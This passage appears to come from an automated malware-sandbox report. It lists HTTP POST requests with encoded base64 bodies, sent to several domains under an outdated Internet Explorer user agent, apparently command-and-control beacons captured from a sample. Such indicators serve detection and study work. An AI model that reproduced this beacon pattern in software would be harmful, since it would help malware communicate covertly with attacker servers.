x0KW+6/5tvzrUmH8zltMW7jjHTXFd/ThUwygFKryQ2x/koiNS0Jr+KFMzOZQxMa1ykRJUfgMUyYOur5rFzUvKzryb3vUfxqSzB0tAF1WhewtPj124GPgNp1ch5AVlReJeXtVnaxc1yOhZqxDBk5DkmHn0+UE4B3aMTqNCveP6aE8loYHcCNd0N9zzESwm1BmsSzoMXuond+4nz3jfLt6kVP7VgOs8AW5WbV7HMdSM62VItVa/NqHtv/h5P3GxG1sb6t14U15raWg3ovSwlSXeCRM+hZCUK/f2r2c7M50DC8MmEpjWw42I2DsEQCCUvUuMH2D0+VCPTFOy12B3efAYmHLFpJbfvmFVzTQvDMuxd6HXItkRLWm/Ipk1AakRyBd2EUyg35e7LypUZQRnGOVGVcJvSN619EhRgIIyKIMVrGEcC+7gl6diLkuYMMY3O5bQiNUwpqrfihat6k01xDkXkTCTmcNp1wP/U4Fjz9a+ubWEIOOWd9/VS2XjJRl+OONUeCNOZXfjPINqpUlgAGaccfaZE5bQydXowHZwoscoBv76rGXNMMxEFSs9D/bog/m7Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 52 67 32 66 6c 6e 32 75 4c 76 7a 78 54 38 6c 34 4e 4a 32 49 72 72 5a 48 4c 75 2b 72 44 32 36 67 41 56 66 78 66 76 39 78 70 59 41 64 45 77 39 73 46 65 74 37 56 33 48 2f 78 48 49 46 6e 6c 4b 74 62 4d 67 55 36 37 72 4a 63 41 36 30 78 72 30 70 4f 78 4e 42 61 4e 50 69 64 76 2f 69 36 4a 50 76 4e 70 33 42 52 4a 69 68 5a 4a 74 74 2f 5a 4c 50 32 44 57 43 4e 70 4e 52 76 58 34 75 6e 6a 46 32 33 5a 38 6d 5a 50 57 64 43 64 66 56 7a 2f 31 38 4e 4f 43 6d 31 48 39 31 69 59 4c 39 78 68 77 30 2f 37 6e 64 4d 62 67 56 4a 75 58 34 32 70 68 6f 75 4e 41 58 79 4e 49 72 69 6a 72 38 71 4b 4f 5a 33 52 68 31 59 4b 6b 48 61 74 41 53 52 58 69 77 39 76 41 44 5a 47 54 4f 2b 55 78 33 67 72 2b 6f 66 46 4d 44 74 6b 76 6d 41 6f 68 58 4c 62 44 6e 71 55 48 4b 2f 46 63 4f 78 38 42 47 35 4f 72 64 32 41 61 43 78 72 47 6a 57 4d 31 73 51 59 37 7a 57 43 33 43 2f 42 5a 46 63 4d 79 75 67 67 43 6b 48 31 46 71 54 6d 58 74 6d 33 74 52 31 64 63 66 6f 32 2b 58 6b 58 49 35 68 7a 4f 53 51 4f 4c 53 51 62 74 53 6f 49 64 4e 31 52 73 76 45 43 73 7a 77 72 39 5a 57 2f 72 35 6f 33 34 2b 6e 59 70 59 32 71 57 54 73 4a 2b 4a 31 6e 42 69 70 42 59 75 61 6b 67 75 52 75 31 79 6d 43 5a 71 57 48 67 58 38 4e 42 33 41 75 67 4c 37 2b 64 71 65 7a 49 63 77 56 64 2b 6c 75 34 75 42 68 44 43 59 31 48 51 37 44 4e 63 4e 4c 7a 34 6c 65 70 56 61 35 41 34 35 2f 6e 31 75 33 6a 6f 65 37 37 34 63 58 43 4a 45 6d 4d 2f 61 6b 47 56 37 66 43 68 41 52 48 66 33 42 2b 77 56 6c 6e 79 47 6d 74 36 46 77 64 45 75 57 71 6b 56 47 46 33 57 4e 68 62 39 46 48 79 6a 2b 6f 69 55 54 4e 31 36 4a 32 6f 6a 49 53 47 55 6c 51 50 74 45 42 42 4a 59 75 76 69 6f 63 35 2f 4e 68 59 2f 50 64 33 57 2f 78 6d 71 41 3d 3d Data Ascii: Rg2fln2uLvzxT8l4NJ2IrrZHLu+rD26gAVfxfv9xpYAdEw9sFet7V3H/xHIFnlKtbMgU67rJcA60xr0pOxNBaNPidv/i6JPvNp3BRJihZJtt/ZLP2DWCNpNRvX4unjF23Z8mZPWdCdfVz/18NOCm1H91iYL9xhw0/7ndMbgVJuX42phouNAXyNIrijr8qKOZ3Rh1YKkHatASRXiw9vADZGTO+Ux3gr+ofFMDtkvmAohXLbDnqUHK/FcOx8BG5Ord2AaCxrGjWM1sQY7zWC3C/BZFcMyuggCkH1FqTmXtm3tR1dcfo2+XkXI5hzOSQOLSQbtSoIdN1RsvECszwr9ZW/r5o34+nYpY2qWTsJ+J1nBipBYuakguRu1ymCZqWHgX8NB3AugL7+dqezIcwVd+lu4uBhDCY1HQ7DNcNLz4lepVa5A45/n1u3joe774cXCJEmM/akGV7fChARHf3B+wVlnyGmt6FwdEuWqkVGF3WNhb9FHyj+oiUTN16J2ojISGUlQPtEBBJYuvioc5/NhY/Pd3W/xmqA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 68 4c 6e 61 44 55 56 42 72 2f 78 7a 34 62 32 6d 62 4d 45 54 52 62 34 4a 6a 34 77 54 7a 67 65 45 53 53 71 2f 4e 48 31 79 61 45 75 51 35 38 48 52 4a 30 67 56 70 71 55 4d 37 6f 4e 33 36 6e 53 58 38 45 30 78 6f 6d 2f 46 30 2f 38 34 63 50 2b 59 65 4f 5a 72 66 54 55 33 35 50 77 33 44 4b 32 68 46 4b 64 53 61 55 75 44 4e 67 69 62 78 30 38 43 35 59 69 6c 66 68 63 36 2f 4a 61 66 4e 63 2f 62 59 70 7a 6a 2b 6d 46 62 79 47 2f 49 46 36 69 70 6b 66 38 66 74 76 61 6f 4f 6c 2f 51 68 37 31 2f 4f 64 58 6f 74 75 30 46 70 39 76 36 6a 78 45 78 54 4c 36 76 72 67 39 38 53 39 6b 7a 66 2f 38 4c 57 4c 41 75 37 38 34 69 51 37 6e 4a 35 53 4c 47 32 30 4e 74 76 76 73 4b 4d 69 78 46 30 76 34 49 31 58 33 6d 2b 73 47 75 66 6f 63 6f 4f 52 39 79 31 6f 57 63 4b 75 4a 2b 66 56 37 69 53 50 76 61 56 52 32 31 4a 6b 64 49 30 66 4e 4d 46 6e 65 66 57 54 61 5a 32 54 66 6a 6c 53 70 51 61 51 30 64 64 73 6a 58 4e 67 61 4a 6f 49 51 6b 58 36 6d 4b 38 2f 30 65 70 45 68 50 64 41 38 4f 4a 4d 6c 79 39 72 76 32 49 52 75 69 41 47 2b 79 65 33 75 6a 6a 43 34 70 6f 79 73 74 36 56 31 36 32 73 6f 64 70 48 44 6d 65 77 47 43 58 4a 55 59 63 50 6c 63 46 35 65 38 4f 39 36 7a 4f 77 4e 34 43 41 79 6a 74 62 61 46 33 74 7a 34 62 49 30 6c 30 79 76 2f 51 54 38 63 6d 44 56 53 62 43 6f 68 75 55 75 68 4f 55 50 72 76 59 35 58 78 57 33 2f 7a 6f 32 67 57 48 75 6f 42 32 34 70 57 39 7a 54 77 33 75 33 4e 59 46 33 64 69 78 51 6f 78 6f 73 35 64 2f 69 61 75 71 4e 6b 52 32 42 2b 47 7a 47 47 51 67 50 61 63 38 65 30 55 69 30 51 2f 56 2b 4f 61 78 48 2b 4a 64 65 2b 4e 6b 38 2f 63 53 67 71 56 57 37 4b 35 31 67 47 2b 48 49 62 7a 65 59 2b 6d 35 78 34 4a 72 65 44 42 47 54 46 53 46 4e 6c 43 4f 74 45 72 56 54 68 4b 79 52 4e 7a 56 58 6b 76 58 2f 4c 66 33 71 6d 39 6f 68 31 47 31 37 44 43 33 46 4f 36 65 46 4d 41 3d 3d Data Ascii: hLnaDUVBr/xz4b2mbMETRb4Jj4wTzgeESSq/NH1yaEuQ58HRJ0gVpqUM7oN36nSX8E0xom/F0/84cP+YeOZrfTU35Pw3DK2hFKdSaUuDNgibx08C5Yilfhc6/JafNc/bYpzj+mFbyG/IF6ipkf8ftvaoOl/Qh71/OdXotu0Fp9v6jxExTL6vrg98S9kzf/8LWLAu784iQ7nJ5SLG20NtvvsKMixF0v4I1X3m+sGufocoOR9y1oWcKuJ+fV7iSPvaVR21JkdI0fNMFnefWTaZ2TfjlSpQaQ0ddsjXNgaJoIQkX6mK8/0epEhPdA8OJMly9rv2IRuiAG+ye3ujjC4poyst6V162sodpHDmewGCXJUYcPlcF5e8O96zOwN4CAyjtbaF3tz4bI0l0yv/QT8cmDVSbCohuUuhOUPrvY5XxW3/zo2gWHuoB24pW9zTw3u3NYF3dixQoxos5d/iauqNkR2B+GzGGQgPac8e0Ui0Q/V+OaxH+Jde+Nk8/cSgqVW7K51gG+HIbzeY+m5x4JreDBGTFSFNlCOtErVThKyRNzVXkvX/Lf3qm9oh1G17DC3FO6eFMA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 78 30 4b 57 2b 36 2f 35 74 76 7a 72 55 6d 48 38 7a 6c 74 4d 57 37 6a 6a 48 54 58 46 64 2f 54 68 55 77 79 67 46 4b 72 79 51 32 78 2f 6b 6f 69 4e 53 30 4a 72 2b 4b 46 4d 7a 4f 5a 51 78 4d 61 31 79 6b 52 4a 55 66 67 4d 55 79 59 4f 75 72 35 72 46 7a 55 76 4b 7a 72 79 62 33 76 55 66 78 71 53 7a 42 30 74 41 46 31 57 68 65 77 74 50 6a 31 32 34 47 50 67 4e 70 31 63 68 35 41 56 6c 52 65 4a 65 58 74 56 6e 61 78 63 31 79 4f 68 5a 71 78 44 42 6b 35 44 6b 6d 48 6e 30 2b 55 45 34 42 33 61 4d 54 71 4e 43 76 65 50 36 61 45 38 6c 6f 59 48 63 43 4e 64 30 4e 39 7a 7a 45 53 77 6d 31 42 6d 73 53 7a 6f 4d 58 75 6f 6e 64 2b 34 6e 7a 33 6a 66 4c 74 36 6b 56 50 37 56 67 4f 73 38 41 57 35 57 62 56 37 48 4d 64 53 4d 36 32 56 49 74 56 61 2f 4e 71 48 74 76 2f 68 35 50 33 47 78 47 31 73 62 36 74 31 34 55 31 35 72 61 57 67 33 6f 76 53 77 6c 53 58 65 43 52 4d 2b 68 5a 43 55 4b 2f 66 32 72 32 63 37 4d 35 30 44 43 38 4d 6d 45 70 6a 57 77 34 32 49 32 44 73 45 51 43 43 55 76 55 75 4d 48 32 44 30 2b 56 43 50 54 46 4f 79 31 32 42 33 65 66 41 59 6d 48 4c 46 70 4a 62 66 76 6d 46 56 7a 54 51 76 44 4d 75 78 64 36 48 58 49 74 6b 52 4c 57 6d 2f 49 70 6b 31 41 61 6b 52 79 42 64 32 45 55 79 67 33 35 65 37 4c 79 70 55 5a 51 52 6e 47 4f 56 47 56 63 4a 76 53 4e 36 31 39 45 68 52 67 49 49 79 4b 49 4d 56 72 47 45 63 43 2b 37 67 6c 36 64 69 4c 6b 75 59 4d 4d 59 33 4f 35 62 51 69 4e 55 77 70 71 72 66 69 68 61 74 36 6b 30 31 78 44 6b 58 6b 54 43 54 6d 63 4e 70 31 77 50 2f 55 34 46 6a 7a 39 61 2b 75 62 57 45 49 4f 4f 57 64 39 2f 56 53 32 58 6a 4a 52 6c 2b 4f 4f 4e 55 65 43 4e 4f 5a 58 66 6a 50 49 4e 71 70 55 6c 67 41 47 61 63 63 66 61 5a 45 35 62 51 79 64 58 6f 77 48 5a 77 6f 73 63 6f 42 76 37 36 72 47 58 4e 4d 4d 78 45 46 53 73 39 44 2f 62 6f 67 2f 6d 37 51 3d 3d Data Ascii: x0KW+6/5tvzrUmH8zltMW7jjHTXFd/ThUwygFKryQ2x/koiNS0Jr+KFMzOZQxMa1ykRJUfgMUyYOur5rFzUvKzryb3vUfxqSzB0tAF1WhewtPj124GPgNp1ch5AVlReJeXtVnaxc1yOhZqxDBk5DkmHn0+UE4B3aMTqNCveP6aE8loYHcCNd0N9zzESwm1BmsSzoMXuond+4nz3jfLt6kVP7VgOs8AW5WbV7HMdSM62VItVa/NqHtv/h5P3GxG1sb6t14U15raWg3ovSwlSXeCRM+hZCUK/f2r2c7M50DC8MmEpjWw42I2DsEQCCUvUuMH2D0+VCPTFOy12B3efAYmHLFpJbfvmFVzTQvDMuxd6HXItkRLWm/Ipk1AakRyBd2EUyg35e7LypUZQRnGOVGVcJvSN619EhRgIIyKIMVrGEcC+7gl6diLkuYMMY3O5bQiNUwpqrfihat6k01xDkXkTCTmcNp1wP/U4Fjz9a+ubWEIOOWd9/VS2XjJRl+OONUeCNOZXfjPINqpUlgAGaccfaZE5bQydXowHZwoscoBv76rGXNMMxEFSs9D/bog/m7Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 32 37 4f 6b 49 32 72 32 72 2f 77 33 2b 4f 65 30 54 62 4c 6d 50 53 33 76 4e 38 47 61 37 68 46 2b 50 69 38 58 78 41 64 39 77 70 47 31 69 52 63 72 34 79 2b 6b 44 35 32 46 6d 2b 7a 50 46 5a 6b 42 2f 34 63 54 68 47 49 58 79 64 43 4f 47 6d 79 4c 70 6d 6c 2b 55 42 67 48 4b 31 46 78 74 39 62 58 2b 41 4b 6e 48 41 4b 2b 6b 57 32 65 6c 6e 48 71 56 56 2b 7a 36 46 71 50 36 4e 6d 6d 4c 35 71 75 71 46 42 4f 78 52 73 63 61 4a 32 57 71 55 63 35 36 6c 34 50 58 42 2f 71 43 6c 54 45 51 70 46 55 55 30 4c 35 39 6f 49 30 56 41 44 4c 73 6f 38 58 45 44 58 4b 52 38 34 4e 2f 63 71 68 4a 43 67 45 74 53 4a 4b 6e 38 78 54 67 35 76 54 63 4c 6a 68 53 71 63 30 49 30 51 76 66 31 34 45 41 30 79 52 74 6e 77 53 41 65 45 76 38 68 30 6e 47 30 76 65 72 64 59 77 2f 67 4c 74 46 79 32 6d 6a 47 67 47 64 74 52 49 51 43 50 30 42 4d 69 58 32 68 67 37 38 59 68 52 43 72 71 46 70 63 55 47 6b 4a 4d 46 69 57 42 6e 6c 44 71 4d 37 78 71 33 37 75 66 6c 66 73 50 37 53 76 6b 62 34 30 4c 38 52 4f 33 32 68 39 63 49 4b 56 6c 71 72 67 52 38 30 4c 62 6e 77 71 76 41 73 41 76 38 70 30 68 39 2b 59 6c 42 4b 33 55 33 41 4e 49 30 37 77 38 50 4f 52 65 79 52 34 5a 6a 52 34 76 2b 7a 32 34 75 64 58 30 37 58 61 55 48 33 74 61 2b 4b 2f 41 64 57 30 55 4b 62 31 4d 57 37 56 68 79 6e 66 6f 56 6f 43 44 58 38 72 33 6c 6a 70 78 6e 64 6a 71 56 52 4e 78 5a 37 4a 53 73 78 6a 33 58 35 33 62 37 73 72 31 36 4e 74 61 67 75 57 39 45 7a 32 45 38 62 70 61 76 4f 52 41 4d 35 4b 30 38 7a 35 61 46 49 38 46 36 55 49 71 30 34 52 36 36 61 72 65 39 44 4c 68 4b 37 6c 54 6c 38 4c 4c 77 4e 36 30 6d 73 76 51 7a 31 4f 75 76 2b 30 35 6e 68 5a 38 67 78 6f 4d 44 31 50 78 35 61 62 66 50 45 59 46 2f 37 45 57 5a 35 63 75 6f 76 74 53 33 72 5a 69 54 75 59 51 2b 52 42 46 61 5a 37 61 4c 48 57 64 74 45 49 4b 65 79 55 75 2b 4b 54 4e 33 7a 45 34 35 75 51 3d 3d Data Ascii: 27OkI2r2r/w3+Oe0TbLmPS3vN8Ga7hF+Pi8XxAd9wpG1iRcr4y+kD52Fm+zPFZkB/4cThGIXydCOGmyLpml+UBgHK1Fxt9bX+AKnHAK+kW2elnHqVV+z6FqP6NmmL5quqFBOxRscaJ2WqUc56l4PXB/qClTEQpFUU0L59oI0VADLso8XEDXKR84N/cqhJCgEtSJKn8xTg5vTcLjhSqc0I0Qvf14EA0yRtnwSAeEv8h0nG0verdYw/gLtFy2mjGgGdtRIQCP0BMiX2hg78YhRCrqFpcUGkJMFiWBnlDqM7xq37uflfsP7Svkb40L8RO32h9cIKVlqrgR80LbnwqvAsAv8p0h9+YlBK3U3ANI07w8POReyR4ZjR4v+z24udX07XaUH3ta+K/AdW0UKb1MW7VhynfoVoCDX8r3ljpxndjqVRNxZ7JSsxj3X53b7sr16NtaguW9Ez2E8bpavORAM5K08z5aFI8F6UIq04R66are9DLhK7lTl8LLwN60msvQz1Ouv+05nhZ8gxoMD1Px5abfPEYF/7EWZ5cuovtS3rZiTuYQ+RBFaZ7aLHWdtEIKeyUu+KTN3zE45uQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 34 70 61 5a 4b 4a 38 66 73 50 78 36 43 5a 74 49 2f 75 69 41 56 43 67 76 75 70 5a 31 2f 4f 4a 36 51 78 46 71 51 4b 48 77 58 4c 76 2b 4d 4e 76 4c 48 6b 6d 6d 30 41 37 43 6f 42 45 4c 4d 39 68 4b 49 30 62 4e 67 53 6c 42 42 79 57 31 73 33 6a 58 53 48 54 63 62 30 45 77 79 6b 68 31 77 4b 41 2f 36 5a 6e 51 50 78 69 6f 4c 6b 45 4f 6f 71 58 46 65 34 71 41 6a 41 43 68 68 46 6e 78 44 38 79 5a 2f 4c 36 53 72 37 6b 79 61 43 53 68 77 6e 6b 43 63 55 33 61 4e 69 61 4e 54 47 32 71 39 45 33 2b 57 39 64 74 4c 45 41 71 63 6b 59 4a 39 2b 4c 44 41 75 64 43 6a 33 58 43 54 62 5a 61 4f 47 71 5a 36 6c 53 4c 2b 44 38 63 72 39 67 6a 4b 58 4f 6e 43 33 5a 50 41 77 6f 39 50 30 4e 74 53 68 45 36 69 41 4e 74 62 2b 77 4f 2b 67 6e 46 2b 4c 36 58 66 36 78 2f 72 32 4b 7a 44 4f 42 69 44 54 67 67 2b 5a 6e 6e 4b 6b 35 61 72 59 33 68 30 64 70 41 76 55 76 36 6c 67 53 53 6d 38 37 73 59 30 35 66 64 6e 65 49 75 71 7a 52 6e 37 77 76 46 62 70 4e 4a 6b 70 54 34 44 75 50 69 76 67 4f 6d 4a 4a 4f 6c 56 77 62 57 4d 45 34 33 2b 5a 2f 62 55 39 62 6c 5a 5a 38 6e 50 79 63 67 68 42 59 59 42 55 33 38 6c 33 31 59 44 79 67 64 4b 4b 7a 37 53 61 57 64 30 48 34 6d 7a 63 6a 6e 44 74 76 4e 30 2b 4c 63 37 48 62 66 30 66 6d 4c 78 4f 63 43 49 53 48 4a 30 71 48 65 36 76 47 4c 46 79 34 79 44 4b 5a 32 36 4e 50 4f 4f 4d 45 63 41 50 6d 65 68 51 44 66 75 70 59 6f 56 7a 52 46 4e 45 61 34 70 51 38 53 69 36 45 69 4c 51 75 50 33 4f 46 65 66 73 47 79 57 43 6d 70 33 36 6c 45 5a 67 5a 46 50 31 4b 78 4e 42 57 39 62 71 78 4d 68 6a 70 55 70 4b 4c 58 6e 4d 52 62 57 59 51 56 36 42 74 4b 39 32 4f 73 38 38 38 30 4f 38 39 55 4e 4c 70 2b 65 49 57 4b 7a 30 41 79 31 56 79 57 6f 58 46 64 61 57 71 34 6a 30 3d Data Ascii: 4paZKJ8fsPx6CZtI/uiAVCgvupZ1/OJ6QxFqQKHwXLv+MNvLHkmm0A7CoBELM9hKI0bNgSlBByW1s3jXSHTcb0Ewykh1wKA/6ZnQPxioLkEOoqXFe4qAjAChhFnxD8yZ/L6Sr7kyaCShwnkCcU3aNiaNTG2q9E3+W9dtLEAqckYJ9+LDAudCj3XCTbZaOGqZ6lSL+D8cr9gjKXOnC3ZPAwo9P0NtShE6iANtb+wO+gnF+L6Xf6x/r2KzDOBiDTgg+ZnnKk5arY3h0dpAvUv6lgSSm87sY05fdneIuqzRn7wvFbpNJkpT4DuPivgOmJJOlVwbWME43+Z/bU9blZZ8nPycghBYYBU38l31YDygdKKz7SaWd0H4mzcjnDtvN0+Lc7Hbf0fmLxOcCISHJ0qHe6vGLFy4yDKZ26NPOOMEcAPmehQDfupYoVzRFNEa4pQ8Si6EiLQuP3OFefsGyWCmp36lEZgZFP1KxNBW9bqxMhjpUpKLXnMRbWYQV6BtK92Os8880O89UNLp+eIWKz0Ay1VyWoXFdaWq4j0=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 68 4c 6e 61 44 55 56 42 72 2f 78 7a 34 62 32 6d 62 4d 45 54 52 62 34 4a 6a 34 77 54 7a 67 65 45 53 53 71 2f 4e 48 31 79 61 45 75 51 35 38 48 52 4a 30 67 56 70 71 55 4d 37 6f 4e 33 36 6e 53 58 38 45 30 78 6f 6d 2f 46 30 2f 38 34 63 50 2b 59 65 4f 5a 72 66 54 55 33 35 50 77 33 44 4b 32 68 46 4b 64 53 61 55 75 44 4e 67 69 62 78 30 38 43 35 59 69 6c 66 68 63 36 2f 4a 61 66 4e 63 2f 62 59 70 7a 6a 2b 6d 46 62 79 47 2f 49 46 36 69 70 6b 66 38 66 74 76 61 6f 4f 6c 2f 51 68 37 31 2f 4f 64 58 6f 74 75 30 46 70 39 76 36 6a 78 45 78 54 4c 36 76 72 67 39 38 53 39 6b 7a 66 2f 38 4c 57 4c 41 75 37 38 34 69 51 37 6e 4a 35 53 4c 47 32 30 4e 74 76 76 73 4b 4d 69 78 46 30 76 34 49 31 58 33 6d 2b 73 47 75 66 6f 63 6f 4f 52 39 79 31 6f 57 63 4b 75 4a 2b 66 56 37 69 53 50 76 61 56 52 32 31 4a 6b 64 49 30 66 4e 4d 46 6e 65 66 57 54 61 5a 32 54 66 6a 6c 53 70 51 61 51 30 64 64 73 6a 58 4e 67 61 4a 6f 49 51 6b 58 36 6d 4b 38 2f 30 65 70 45 68 50 64 41 38 4f 4a 4d 6c 79 39 72 76 32 49 52 75 69 41 47 2b 79 65 33 75 6a 6a 43 34 70 6f 79 73 74 36 56 31 36 32 73 6f 64 70 48 44 6d 65 77 47 43 58 4a 55 59 63 50 6c 63 46 35 65 38 4f 39 36 7a 4f 77 4e 34 43 41 79 6a 74 62 61 46 33 74 7a 34 62 49 30 6c 30 79 76 2f 51 54 38 63 6d 44 56 53 62 43 6f 68 75 55 75 68 4f 55 50 72 76 59 35 58 78 57 33 2f 7a 6f 32 67 57 48 75 6f 42 32 34 70 57 39 7a 54 77 33 75 33 4e 59 46 33 64 69 78 51 6f 78 6f 73 35 64 2f 69 61 75 71 4e 6b 52 32 42 2b 47 7a 47 47 51 67 50 61 63 38 65 30 55 69 30 51 2f 56 2b 4f 61 78 48 2b 4a 64 65 2b 4e 6b 38 2f 63 53 67 71 56 57 37 4b 35 31 67 47 2b 48 49 62 7a 65 59 2b 6d 35 78 34 4a 72 65 44 42 47 54 46 53 46 4e 6c 43 4f 74 45 72 56 54 68 4b 79 52 4e 7a 56 58 6b 76 58 2f 4c 66 33 71 6d 39 6f 68 31 47 31 37 44 43 33 46 4f 36 65 46 4d 41 3d 3d Data Ascii: hLnaDUVBr/xz4b2mbMETRb4Jj4wTzgeESSq/NH1yaEuQ58HRJ0gVpqUM7oN36nSX8E0xom/F0/84cP+YeOZrfTU35Pw3DK2hFKdSaUuDNgibx08C5Yilfhc6/JafNc/bYpzj+mFbyG/IF6ipkf8ftvaoOl/Qh71/OdXotu0Fp9v6jxExTL6vrg98S9kzf/8LWLAu784iQ7nJ5SLG20NtvvsKMixF0v4I1X3m+sGufocoOR9y1oWcKuJ+fV7iSPvaVR21JkdI0fNMFnefWTaZ2TfjlSpQaQ0ddsjXNgaJoIQkX6mK8/0epEhPdA8OJMly9rv2IRuiAG+ye3ujjC4poyst6V162sodpHDmewGCXJUYcPlcF5e8O96zOwN4CAyjtbaF3tz4bI0l0yv/QT8cmDVSbCohuUuhOUPrvY5XxW3/zo2gWHuoB24pW9zTw3u3NYF3dixQoxos5d/iauqNkR2B+GzGGQgPac8e0Ui0Q/V+OaxH+Jde+Nk8/cSgqVW7K51gG+HIbzeY+m5x4JreDBGTFSFNlCOtErVThKyRNzVXkvX/Lf3qm9oh1G17DC3FO6eFMA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 48 5a 68 45 4e 57 6f 70 77 66 77 49 48 65 56 76 54 55 6b 59 46 43 32 61 35 69 4b 61 58 52 4b 2f 50 73 72 61 62 53 6f 73 41 36 6f 38 42 6b 6b 42 74 4a 47 76 4d 62 56 34 4b 2f 34 6f 39 71 74 4b 35 4e 42 38 74 6d 36 65 2f 59 6d 66 4d 4c 30 34 67 7a 75 55 67 72 47 6f 34 6c 63 37 63 30 4a 6e 6e 78 4d 32 70 30 54 67 31 4a 33 59 73 65 5a 31 45 35 4c 61 74 33 58 39 65 59 52 38 6a 53 6c 32 46 31 4c 46 67 4c 70 58 46 62 67 31 72 75 69 6b 50 4e 2f 6a 36 4c 62 41 65 50 30 32 71 62 79 32 42 6c 57 63 78 38 33 66 34 41 61 6f 33 50 75 6e 48 71 55 79 79 49 37 76 6e 75 51 59 49 69 7a 70 2f 35 67 65 57 72 52 4d 35 67 53 56 4a 56 53 45 61 43 4b 68 31 63 37 57 62 48 68 67 6f 4c 77 50 5a 35 41 6c 43 49 53 4c 57 2f 50 4d 76 47 35 6c 47 66 2b 49 6d 5a 74 33 68 45 47 46 2f 51 75 6a 76 57 36 39 66 39 37 58 30 75 76 64 61 68 6d 2b 49 6e 46 64 49 46 76 36 52 6e 70 74 57 4b 74 6c 54 77 46 38 54 63 38 45 2f 39 66 35 71 2b 39 30 54 76 72 63 44 78 47 7a 64 4a 39 35 66 54 4b 50 61 32 68 64 79 33 6f 6e 47 51 78 57 77 50 77 73 4e 38 79 41 72 52 30 39 43 70 6a 49 6e 35 4c 64 2b 79 5a 58 6e 68 2f 32 51 73 6d 6d 4f 46 72 50 50 72 7a 54 32 4e 4b 43 56 6e 66 6f 62 71 53 79 38 79 65 46 74 72 65 77 45 38 57 66 79 72 36 75 76 5a 41 50 66 52 4f 34 31 4e 75 63 35 54 7a 54 71 78 69 6d 46 39 30 57 6c 2b 54 5a 54 4d 37 7a 70 42 78 57 55 69 4d 69 6c 32 48 36 73 68 68 52 69 66 42 6e 49 46 57 70 34 32 70 75 78 2f 4d 46 74 75 4d 72 62 6b 37 48 4f 7a 58 48 72 49 6f 72 71 76 47 63 4b 54 72 59 51 63 33 4c 51 57 48 58 37 55 34 43 50 53 45 4a 50 77 6a 45 41 4e 44 65 62 37 7a 2f 72 36 54 45 6f 56 47 50 72 66 77 5a 57 42 42 41 77 42 6f 4b 39 4e 4e 74 4c 65 4d 61 79 63 67 30 6f 44 59 43 68 32 49 3d Data Ascii: HZhENWopwfwIHeVvTUkYFC2a5iKaXRK/PsrabSosA6o8BkkBtJGvMbV4K/4o9qtK5NB8tm6e/YmfML04gzuUgrGo4lc7c0JnnxM2p0Tg1J3YseZ1E5Lat3X9eYR8jSl2F1LFgLpXFbg1ruikPN/j6LbAeP02qby2BlWcx83f4Aao3PunHqUyyI7vnuQYIizp/5geWrRM5gSVJVSEaCKh1c7WbHhgoLwPZ5AlCISLW/PMvG5lGf+ImZt3hEGF/QujvW69f97X0uvdahm+InFdIFv6RnptWKtlTwF8Tc8E/9f5q+90TvrcDxGzdJ95fTKPa2hdy3onGQxWwPwsN8yArR09CpjIn5Ld+yZXnh/2QsmmOFrPPrzT2NKCVnfobqSy8yeFtrewE8Wfyr6uvZAPfRO41Nuc5TzTqximF90Wl+TZTM7zpBxWUiMil2H6shhRifBnIFWp42pux/MFtuMrbk7HOzXHrIorqvGcKTrYQc3LQWHX7U4CPSEJPwjEANDeb7z/r6TEoVGPrfwZWBBAwBoK9NNtLeMaycg0oDYCh2I=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 52 67 32 66 6c 6e 32 75 4c 76 7a 78 54 38 6c 34 4e 4a 32 49 72 72 5a 48 4c 75 2b 72 44 32 36 67 41 56 66 78 66 76 39 78 70 59 41 64 45 77 39 73 46 65 74 37 56 33 48 2f 78 48 49 46 6e 6c 4b 74 62 4d 67 55 36 37 72 4a 63 41 36 30 78 72 30 70 4f 78 4e 42 61 4e 50 69 64 76 2f 69 36 4a 50 76 4e 70 33 42 52 4a 69 68 5a 4a 74 74 2f 5a 4c 50 32 44 57 43 4e 70 4e 52 76 58 34 75 6e 6a 46 32 33 5a 38 6d 5a 50 57 64 43 64 66 56 7a 2f 31 38 4e 4f 43 6d 31 48 39 31 69 59 4c 39 78 68 77 30 2f 37 6e 64 4d 62 67 56 4a 75 58 34 32 70 68 6f 75 4e 41 58 79 4e 49 72 69 6a 72 38 71 4b 4f 5a 33 52 68 31 59 4b 6b 48 61 74 41 53 52 58 69 77 39 76 41 44 5a 47 54 4f 2b 55 78 33 67 72 2b 6f 66 46 4d 44 74 